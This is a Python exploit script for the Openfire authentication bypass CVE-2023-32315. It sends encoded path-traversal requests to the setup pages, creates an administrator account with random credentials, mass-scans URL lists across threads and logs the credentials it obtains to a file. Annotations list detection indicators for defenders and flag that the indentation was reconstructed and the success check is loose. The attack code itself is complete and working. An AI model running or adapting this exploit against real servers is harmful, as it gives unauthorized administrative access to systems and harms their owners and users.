openfire_CVE-2023-32315_exploit.py
# Author: VulnExpo
# Date: 2023-10-23
import requests
import argparse
import threading
import httplib2
import random
import re
import string
# Silence urllib3's InsecureRequestWarning for the whole process. `requests` is
# not used for any HTTP call in this file; the requests below go through
# httplib2, which is created with certificate validation disabled.
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def generate_random_username(length=8):
    """Return ``length`` random characters drawn from ASCII letters and digits.

    ``check_for_vulnerability`` uses the result as the login name of the
    account it asks the server to create, so the only fixed property of those
    names is their length and alphabet.
    """
    alphabet = string.ascii_letters + string.digits
    picked = []
    for _ in range(length):
        picked.append(random.choice(alphabet))
    return ''.join(picked)
def generate_random_password(length=12):
    """Return ``length`` random characters from letters, digits and punctuation.

    The pool is ``string.ascii_letters + string.digits + string.punctuation``,
    i.e. every printable ASCII character except the space.
    """
    pool = string.ascii_letters + string.digits + string.punctuation
    chars = []
    for _ in range(length):
        chars.append(random.choice(pool))
    return ''.join(chars)
def check_for_vulnerability(url, proxies=None, success_file=None):
    """Probe one Openfire base URL for CVE-2023-32315 and, on success, add an admin user.

    Despite the name this is not a read-only check: the second request asks
    the server to create an account with ``isadmin=on`` and random
    credentials, which are then printed and appended to ``success_file``.

    What a defender can look for, all taken from the requests built below:
      - request paths under ``/setup/setup-s/`` that contain ``%u002e%u002e``
        segments and end in ``user-groups.jsp`` or ``user-create.jsp``;
      - a ``user-create.jsp`` query string carrying ``isadmin=on``;
      - the fixed Chrome/109 User-Agent string on the second request;
      - admin accounts nobody provisioned, named with 8 ASCII letters/digits.
    Presumably an account created this way stays until it is removed, so the
    admin user list needs auditing as well as applying the vendor's fix for
    CVE-2023-32315.

    Args:
        url: Base URL; the paths are appended by plain string concatenation.
        proxies: Not referenced anywhere in this function.
        success_file: Path opened in append mode to record the URL and the
            generated credentials in clear text.

    Returns:
        True after the create request answered 200 and its body contained
        "at"; False when no ``csrf=`` value was found in the first response's
        headers, and on the fall-through at the end.

    NOTE(review): the listing this was taken from had lost its indentation;
    the nesting below (in particular the placement of the final
    ``return False``) is reconstructed and should be confirmed against the
    original file.
    """
    # The %u002e%u002e segments are an encoded form of "..", placed after the
    # setup path.
    path = '/setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp'
    rsp_list = ''
    # TLS certificate validation is off and no proxy is configured here.
    http = httplib2.Http(disable_ssl_certificate_validation=True, proxy_info=None, timeout=10)
    try:
        response, content = http.request(url + path, method='GET')
        # Concatenate every response header value into one string so the
        # cookies can be pulled out with regular expressions.
        for header_name, header_value in response.items():
            rsp_list += header_value
        if "csrf=" in rsp_list:
            # Session id and CSRF token issued by the server in response to
            # the first request.
            JSESSIONID = re.findall(r'JSESSIONID=(.*?);', rsp_list)[0]
            csrf = re.findall(r'csrf=(.*?);', rsp_list)[0]
        else:
            # No csrf cookie came back: treated as "not vulnerable".
            return False
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',
            'Cookie': 'JSESSIONID={}; csrf={}'.format(JSESSIONID, csrf)
        }
        random_username = generate_random_username()
        random_password = generate_random_password()
        # State-changing request: creates a user flagged as administrator.
        # The values are inserted into the query string with str.format only.
        addpath = '/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf={}&username={}&name=&email=&password={}&passwordConfirm={}&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7'.format(
            csrf, random_username, random_password, random_password)
        add_user, content = http.request(url + addpath, method='GET', headers=headers)
        # Success is inferred from a 200 status plus the substring "at" in the
        # body; NOTE(review): that is a loose match, so a reported hit does not
        # by itself prove an account exists on the server.
        if add_user.status == 200 and "at" in content.decode('utf-8'):
            print(f"目标URL: {url} username: {random_username}, password: {random_password}")
            # Credentials are written unencrypted; the file itself is
            # sensitive evidence if found on a host.
            with open(success_file, 'a') as s_file:
                s_file.write(f"++++++++++++++++++\n")
                s_file.write(f"目标URL: {url}\n")
                s_file.write(f"响应内容: username: {random_username}, password: {random_password}\n\n")
            return True
    except Exception as e:
        # Any failure (network, decoding, missing cookie match) is printed and
        # swallowed.
        print(f"发生异常:{e}")
    return False
def scan_targets(targets, proxies=None, success_file=None):
    """Run ``check_for_vulnerability`` on every entry of ``targets``, in order.

    Each entry is stripped of surrounding whitespace first (entries may come
    straight from ``readlines()``). The per-target return value is discarded.
    """
    for raw_entry in targets:
        check_for_vulnerability(raw_entry.strip(), proxies, success_file)
def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
    """Split ``urls`` across ``num_threads`` threads and wait for all of them.

    Thread ``i`` receives the slice ``urls[i::num_threads]`` and runs
    ``scan_targets`` on it. All threads append to the same ``success_file``;
    no lock is taken around those writes.
    """
    workers = [
        threading.Thread(
            target=scan_targets,
            args=(urls[offset::num_threads], proxies, success_file),
        )
        for offset in range(num_threads)
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
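if __name__ == '__main__':
    # Command-line entry point: read one URL (-u) or a file of URLs (-f),
    # then hand the list to multi_threaded_scan.
    parser = argparse.ArgumentParser(description="Openfire 身份认证绕过CVE-2023-32315")
    parser.add_argument("-u", "--url", help="目标URL")
    parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
    parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
    parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
    args = parser.parse_args()
    # --file defaults to "url.txt", so this guard only fires if -f is passed
    # an empty string.
    if not args.url and not args.file:
        print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
        exit(1)
    # A single -u URL takes precedence over the URL list file.
    if args.url:
        urls = [args.url]
    elif args.file:
        with open(args.file, 'r') as file:
            urls = file.readlines()
    # Every reported hit, including the generated credentials, is appended to
    # this file in the current working directory.
    success_file = 'success_targets.txt'
    proxies = {
        "http": args.proxy,
        "https": args.proxy
    } if args.proxy else None
    multi_threaded_scan(urls, proxies, success_file, args.threads)
    # The closing parenthesis of this call was missing in the listing.
    print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")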